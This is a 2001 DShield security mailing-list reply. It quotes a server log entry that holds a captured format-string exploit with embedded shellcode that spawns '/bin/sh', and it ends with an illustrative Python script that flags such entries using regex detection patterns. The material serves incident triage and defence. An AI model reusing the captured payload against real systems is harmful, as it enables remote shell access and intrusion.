[Dshield] Re2: Dshield digest, Vol 1 #334 - 1 msg

poweredbysun jimlynch at poweredbysun.com
Fri Nov 16 03:45:45 GMT 2001


This link has a bit more info:
http://www.kb.cert.org/vuls/id/382365
for whatever it is worth.
Jim
dshield-request at dshield.org wrote:
> Today's Topics:
> 
>    1. buffer overflow? (ALEPH0)
> 
> --__--__--
> 
> Message: 1
> From: "ALEPH0" <aleph0 at pacbell.net>
> To: "Dshield List" <dshield at dshield.org>
> Date: Wed, 14 Nov 2001 21:45:37 -0800
> Subject: [Dshield] buffer overflow?
> Reply-To: dshield at dshield.org
> 
> Found these in my logs (copy/paste from vi).  Looks like a buffer overflow
> to get a shell attempt.  They are in repetitive groups and on each of my
> servers on one of my networks.  Anyone know this one in particular and if I
> should be concerned?  What I don't know is what is SERVER here.
> 
> Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line
> 'BBì¿í¿î¿ï¿XXXXXXXXXXXXXXXXXX%.172u%300$n%.17u%301$n%.253u%302$n%.192u%303$n
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@~Iå1Ò²f~I
> 1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IM ~MEì~IEøÆEü^P~I ~MMôÍ~@~I
> CCÍ~@~I CÍ~@~IÃ1ɲ?~I Í~@~I
> AÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K~Ió~MM^H~MU^LÍ~@èã/bin/sh'
> 
> I also run a bunch of homebuilt fake logging daemons on many trojan ports
> and found on this same network a lot of activity on port 27374 starting a
> couple days ago.
> 
> --__--__--
> 
> End of Dshield Digest
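
An added example, not part of the original messages: a small Python triage script that flags syslog entries like the one quoted above by looking for printf write directives (such as `%300$n`), precision-padded conversions, long filler runs and a shell path. The function names, the indicator list and the sample lines are constructed for illustration; the first sample is a shortened stand-in for the quoted entry.

```python
import re

# printf "write" directives: %n, %hn, %hhn, %ln, optionally positional (%300$n).
WRITE_DIRECTIVE = re.compile(r"%(?:\d+\$)?(?:hh|h|l)?n")
# Precision-padded conversions such as %.172u, which inflate the output count.
PADDED_CONV = re.compile(r"%\.\d+[dux]")
# Sixteen or more repeats of the same 1-2 character unit ("XXXX...", "~P~P...").
FILLER_RUN = re.compile(r"(.{1,2})\1{15,}")
SHELL_PATH = re.compile(r"/bin/(?:ba|c|k)?sh\b")
# Classic BSD syslog layout: "Mon DD HH:MM:SS host program[pid]: message".
SYSLOG = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) (\S+) ([^\[:]+)(?:\[(\d+)\])?: (.*)$", re.S)

CHECKS = [
    ("printf-write-directive", WRITE_DIRECTIVE),
    ("padded-conversion", PADDED_CONV),
    ("filler-run", FILLER_RUN),
    ("shell-path", SHELL_PATH),
]

# Constructed sample lines (assumption: not real log data).
SAMPLE = [
    "Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line "
    "'BB" + "X" * 18 + "%.172u%300$n%.17u%301$n" + "~P" * 40 + "/bin/sh'",
    "Nov 14 20:44:02 hostname sshd[811]: Accepted publickey for admin from 192.0.2.10",
    "Nov 14 20:45:10 hostname SERVER[4310]: Dispatch_input: bad request line "
    "'GET /my%20notes%20name HTTP/1.0'",  # URL-encoded spaces must not be flagged
]

def triage(line):
    """Parse one syslog line; return its fields plus the indicators it matched."""
    m = SYSLOG.match(line)
    if m is None:
        return None  # not in the expected syslog layout
    when, host, program, pid, message = m.groups()
    reasons = [name for name, rx in CHECKS if rx.search(message)]
    return {"time": when, "host": host, "program": program,
            "pid": pid, "reasons": reasons}

def flagged(lines):
    """Return the parsed entries that matched at least one indicator."""
    parsed = (triage(line) for line in lines)
    return [entry for entry in parsed if entry and entry["reasons"]]

if __name__ == "__main__":
    for entry in flagged(SAMPLE):
        print(entry["time"], entry["program"], entry["pid"], ",".join(entry["reasons"]))
```

A hit is a prompt to check which daemon logged the line and whether it is patched, not proof of compromise.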
